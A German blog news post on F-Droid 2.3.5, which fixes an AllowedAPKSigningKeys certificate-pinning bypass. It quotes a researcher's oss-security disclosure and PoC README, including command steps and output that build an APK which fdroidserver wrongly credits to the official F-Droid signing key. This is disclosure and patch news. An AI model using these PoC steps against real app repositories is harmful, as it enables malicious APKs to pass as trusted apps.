
BREAKING NEWS: F-Droid fixt größeres Zertifikatsproblem in v2.3.5
Die lange schwelenden Konflikte rund um Best Practice
bei F-Droid
zeitigen nun erste, konstruktive Früchte. So fixt die ganz frische Version 2.35
Probleme rund um v1-only-Signaturen
. Update wärmstens empfohlen.
Fdroid v2.35 ist raus und behebt Sicherheitsprobleme in Verbindung mit v1-only-Signaturen
. Ein zeitiges Update wird daher angeraten. Calling all F-Bots…
💱 Changelog:
- Behebung eines Problems, bei dem APKs mit reinen
v1-Signaturen
undtargetSdkVersion < 30
in böser Absicht erstellt werden konnten, umAllowedAPKSigningKeys
zu umgehen !1588 - Ignoriere
apksigner v33.x,
es hat Fehler bei der Überprüfung von APKs mit v3/v3.1-Signaturen. !1593 - Synchronisiere Übersetzungen für:
ca cs de es fr ga ja pt_BR pt_PT ru sq sr uk zh_Hans
s3n🧩net wünscht viel Vergnügen mit Ihrem freien Androiden
⏰ Update: Noch nicht ALLE Problemchen gefixt. Stay tuned…
⏰ Update: Es ist kompliziert
Weitere Infos: https://www.openwall.com/lists/oss-security/2025/01/20/1
⏰ Update: Es ist wirklich kompliziert
Noch mehr Infos: https://www.openwall.com/lists/oss-security/2025/01/20/1
Message-ID: <Z42Y1FjRnsbw5GZD@nihonium> Date: Mon, 20 Jan 2025 01:29:08 +0100 From: Fay Stegerman <flx@...usk.net> To: oss-security@...ts.openwall.com Subject: fdroidserver AllowedAPKSigningKeys certificate pinning fundamentally unreliable Hi! Another update for [1,2,3], still published at [4]: another PoC (bringing the total to 6) and a lot of new background information. I've attached the new and updated files and included the new sections from the README with the updates below. - Fay [1] https://www.openwall.com/lists/oss-security/2024/04/08/8 [2] https://www.openwall.com/lists/oss-security/2024/04/20/3 [3] https://www.openwall.com/lists/oss-security/2025/01/03/1 [4] https://github.com/obfusk/fdroid-fakesigner-poc
⏰ Update: aus dem POC
Bei IzzyOnDroid
wird (noch) fdroidserver
verwendet. Allerdings setzt IzzyOnDroid auf die vom Security-Experten sowohl im entsprechenden Issue
bei fdroidserver
als auch im POC
empfohlenen Patches
.
⏰ Update: obfusk (f-droid fakesigner mit einem Update von heute
Update (2025-01-22)
APKsigner
It seems F-Droid is now blaming the bugs in their own code on
apksigner
[17]:apksigner v33.0.x falsely verifies invalid APK which leads to wrong cert extracted for AllowedAPKSigningKeys
They are clearly aware that the APK, whilst indeed containing a v3.1 signature without a corresponding v3 signature, is considered perfectly valid by Android itself and installs without any problems on Android 13-15:
I could install the poc-v6.apk in an SDK-34 emulator.
Yet they blame
apksigner
versions supporting v3.1 signatures but lacking an extra check that was added in later versions instead of acknowledging that the reasonfdroidserver
incorrectly returns the wrong certificate is that their own code is simply ignoring v3.1 signatures: yet another example that "different implementations can open up exploit vectors" and still nothing done to address that underlying issue.NB:
apksigner
is correct to have added this extra check as v3.1 signatures should always have a corresponding v3 signature. But the lack of a corresponding v3 signature does not have any security implications for Android, which correctly considers such signatures valid. And there would have been no security implications forfdroidserver
either if not for its fundamentally broken approach to extracting the certificate using custom Python code instead of relying onapksig
for both verification and extraction to guarantee the extracted certificate is the same one actually used for verification.·
POC
NB: you currently need the
signing
branch ofapksigtool
[9].NB: the "fake" signer shown here is from the official F-Droid client (its APK has a v1+v2+v3 signature), the one
apksigner
sees is randomly generated bymake-key.sh
; theapp.apk
used for testing hadminSdk 26
and a v2 signature only. Using APKs with other signature scheme combinations is certainly possible, but might require adjusting the PoC code accordingly.$ ./make-key.sh # generates a dummy key $ python3 make-poc-v1.py # uses app.apk (needs minSdk >= 24) as base, adds fake.apk .RSA $ python3 fdroid.py # verifies and has fake.apk as signer according to F-Droid True 43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab $ python3 make-poc-v2.py # uses app.apk as base, adds signing block from fake.apk $ python3 fdroid.py # verifies and has fake.apk as signer according to F-Droid True 43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab $ apksigner verify -v --print-certs poc.apk | grep -E '^Verified using|Signer #1 certificate (DN|SHA-256)' Verified using v1 scheme (JAR signing): false Verified using v2 scheme (APK Signature Scheme v2): true Verified using v3 scheme (APK Signature Scheme v3): true Verified using v4 scheme (APK Signature Scheme v4): false Signer #1 certificate DN: CN=oops Signer #1 certificate SHA-256 digest: 029df1354735e81eb97c9bbef2185c8ead3bc78ae874c03a6e96e1e1435ac519$ mkdir fakesigner $ cd fakesigner $ fdroid init -d oops --repo-keyalias fakesigner $ mkdir metadata $ printf 'Name: MyApp\nAllowedAPKSigningKeys: 43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab\n' > metadata/some.app.id.yml $ cp /path/to/poc.apk repo/ $ fdroid update $ jq '.packages[].versions[].manifest.signer.sha256' < repo/index-v2.json [ "43238d512c1e5eb2d6569f4a3afbf5523418b82e0a3ed1552770abb9a9c9ccab" ]
Stay tuned…
Comments